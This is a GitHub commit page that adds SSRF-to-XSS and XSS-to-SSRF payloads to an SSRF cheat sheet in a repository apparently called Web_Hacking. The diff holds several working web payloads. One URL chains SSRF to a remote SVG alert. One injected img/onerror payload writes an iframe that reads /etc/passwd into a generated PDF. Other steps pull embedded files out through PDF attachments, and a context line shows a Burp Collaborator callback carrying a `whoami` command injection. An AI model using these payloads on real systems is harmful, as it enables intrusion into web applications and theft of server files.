vos9/Web_Hacking
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Update SSRF.md

Browse Source
This commit is contained in:
Mehdi 2023-08-23 11:28:31 +03:30 committed by GitHub
parent 024697d5c3
commit feac18369e
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 29 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

29
SSRF.md
View File

@ -291,6 +291,35 @@ url=http://3iufty2q67fuy2dew3yug4f34.burpcollaborator.net?`whoami`
Checking the time of the responses from the server it might be possible to know if a resource exists or not (maybe it takes more time accessing an existing resource than accessing one that doesn't exist) Checking the time of the responses from the server it might be possible to know if a resource exists or not (maybe it takes more time accessing an existing resource than accessing one that doesn't exist)
## SSRF to XSS
```html
http://brutelogic.com.br/poc.svg //simple alert
https://website.mil/plugins/servlet/oauth/users/icon-uri?consumerUri= //simple ssrf
https://website.mil/plugins/servlet/oauth/users/icon-uri?consumerUri=http://brutelogic.com.br/poc.svg
```
## SSRF from XSS
**Using an iframe**
The content of the file will be integrated inside the PDF as an image or text
```javascript
<img src="echopwn" onerror="document.write('<iframe src=file:///etc/passwd></iframe>')"/>
```
**Using an attachment**
Example of a PDF attachment using HTML
1. use `<link rel=attachment href="URL">` as Bio text
2. use `'Download Data'` feature to get PDF
3. use `pdfdetach -saveall filename.pdf` to extract embedded resource
4. cat `attachment.bin`
# Tools # Tools
* https://github.com/swisskyrepo/SSRFmap * https://github.com/swisskyrepo/SSRFmap